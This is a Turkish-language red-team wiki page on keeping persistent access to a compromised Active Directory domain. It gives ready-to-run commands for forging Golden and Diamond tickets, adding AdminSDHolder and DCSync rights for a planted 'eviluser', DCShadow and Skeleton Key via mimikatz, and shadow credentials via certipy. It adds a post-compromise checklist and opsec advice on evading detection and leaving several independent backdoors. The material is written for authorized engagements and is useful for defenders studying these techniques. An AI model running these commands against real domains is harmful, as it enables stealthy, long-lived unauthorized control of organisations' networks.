Domain Persistence
ATT&CK T1098 persistence
Domain ele geçirildikten sonra saldırganlar, tespit ve temizlik sonrası bile erişimi korumak için çeşitli kalıcılık teknikleri kurar. Bunlar genellikle DA/ DCSync yetkisi gerektirir. Amaç: tek bir parola reset’inin erişimi koparmamasını sağlamak.
Bilet tabanlı kalıcılık
Section titled “Bilet tabanlı kalıcılık”Golden Ticket
Section titled “Golden Ticket”krbtgt NTLM/AES ele geçince istediğin kullanıcı/gruplarla TGT forge edilir. krbtgt iki kez rotate edilmedikçe (eski + yeni key) biletler yaşamaya devam eder. Ayrıntı: Golden Ticket.
impacket-ticketer -aesKey <krbtgt_aes256> -domain-sid S-1-5-21-... \ -domain domain.local -user-id 500 AdministratorSilver Ticket
Section titled “Silver Ticket”Servis (bilgisayar/servis hesabı) hash’i ile tek SPN’e TGS. DC ile konuşmaz — daha sessiz. Ayrıntı: Silver Ticket.
Diamond / Sapphire Ticket
Section titled “Diamond / Sapphire Ticket”Meşru bir TGT alınıp PAC manipüle edilir (veya PKINIT/Sapphire ile daha az anomali). Saf forge Golden’a göre PAC alanları gerçek biletlerle uyumlu kalır; bazı tespit kurallarını zorlar.
# Rubeus diamond (örnek akış — geçerli TGT + krbtgt AES gerekir)Rubeus.exe diamond /krbkey:<krbtgt_aes> /user:Administrator /enctype:aes /pttACL / nesne tabanlı
Section titled “ACL / nesne tabanlı”AdminSDHolder
Section titled “AdminSDHolder”CN=AdminSDHolder,CN=System,DC=… ACL’i, SDProp (~60 dk) ile adminCount=1 nesnelere kopyalanır. Buraya ACE eklemek Domain Admins vb. üzerinde kalıcı hak yayar.
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' \ -PrincipalIdentity eviluser -Rights AllbloodyAD -u admin -p 'Pass' -d domain.local --host DC \ add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' eviluserDCSync hakkı bırakma
Section titled “DCSync hakkı bırakma”Düşük profil bir kullanıcıya DS-Replication-Get-Changes + DS-Replication-Get-Changes-All ver; gerektiğinde hash çek.
impacket-dacledit -action write -rights DCSync -principal eviluser \ -target-dn 'DC=domain,DC=local' domain.local/admin:'Pass'bloodyAD -u admin -p 'Pass' -d domain.local --host DC \ add dcsync eviluserBloodHound: DCSync / GetChanges / GetChangesAll kenarları.
Gizli grup üyeliği / nesting
Section titled “Gizli grup üyeliği / nesting”- Nested group ile DA’ya dolaylı üyelik.
- Az bilinen grup ( DnsAdmins → DLL load — ayrı teknik; Account Operators …).
- Bilgisayar hesabı üzerinde Shadow Credentials bırakma ( Shadow Credentials ).
DC / veritabanı tabanlı
Section titled “DC / veritabanı tabanlı”DCShadow
Section titled “DCShadow”Saldırgan sahte DC gibi davranıp replikasyonla nesne/öznitelik değiştirir (mimikatz). İki oturum: biri RPC register, biri push.
# Yüksek yetki + özel ortam; lab'da dikkatli kullanlsadump::dcshadow /object:CN=evil,... /attribute:primaryGroupID /value:512# ikinci mimikatz:lsadump::dcshadow /pushSkeleton Key
Section titled “Skeleton Key”LSASS’a yama; tüm hesaplar için master parola (DC reboot’a kadar).
privilege::debugmisc::skeletonDSRM (Directory Services Restore Mode)
Section titled “DSRM (Directory Services Restore Mode)”DC’nin yerel Administrator parolası; DSRM logon veya registry ile DsrmAdminLogonBehavior ayarlanmışsa ağdan da kullanılabilir. Parolayı biliniyorsa / set edilmişse backdoor.
# DSRM hash'i SYSTEM hive / ntdsutil ile yönetilir# mimikatz: lsadump::sam (DSRM bağlamı)Sertifika tabanlı kalıcılık
Section titled “Sertifika tabanlı kalıcılık”- CA’da rogue şablon veya ESC1 benzeri kalıcı enroll hakkı.
- Hedef DA hesabına Shadow Credentials / ekstra KeyCredential.
- CA private key export (CA ele geçirildiyse) → istediğin UPN’e cert imzala.
certipy shadow auto -u admin@domain.local -p 'Pass' -account 'DC01$'certipy shadow auto -u admin@domain.local -p 'Pass' -account 'targetuser'Hızlı kurulum checklist (DA sonrası)
Section titled “Hızlı kurulum checklist (DA sonrası)”-
krbtgt AES + NTLM yedekle (offline, şifreli) — Golden için.
-
DCSync ACE düşük profil kullanıcıya (veya gizli bilgisayar hesabı).
-
AdminSDHolder ACE (opsiyonel; agresif).
-
Silver Ticket için kritik sunucu machine hash’leri (CIFS/HOST).
-
Shadow cred veya cert persistence (PKINIT ortamlarında).
-
Temizlik için not: hangi SID/ACE/cert eklendi — angajman kapanışı.
Opsec (ofansif)
Section titled “Opsec (ofansif)”- AdminSDHolder ve açık DA grup üyeliği en çok denetlenen değişiklikler.
- DCSync ACE’si “sessiz” görünebilir; yine de ACL change event üretir.
- Skeleton Key / DCShadow çok gürültülü ve kararsız — prod’da nadiren uygun.
- Golden Ticket’ta AES + gerçek userId (500) kullan; rastgele user PAC anomalisi yaratır.
- Birden fazla bağımsız persistence bırak; tek vektör temizlenebilir.
Yaygın tuzaklar
Section titled “Yaygın tuzaklar”- krbtgt tek reset → eski key hâlâ geçerli; double reset gerekir (temizlik tarafı) — kırmızı takım olarak bunu bilerek “kalıcı” say.
- AdminSDHolder ACE sonrası 60 dk beklemeden test etmek “çalışmıyor” sanısına yol açar.
- Silver Ticket PAC’te yanlış domain SID / group RID → erişim denied.
- DSRM ağ logonu varsayılan kapalı; registry olmadan “ölü” backdoor.
İlişkili sayfalar
Section titled “İlişkili sayfalar”Golden Ticket · Silver Ticket · DCSync · ACL Abuse · Shadow Credentials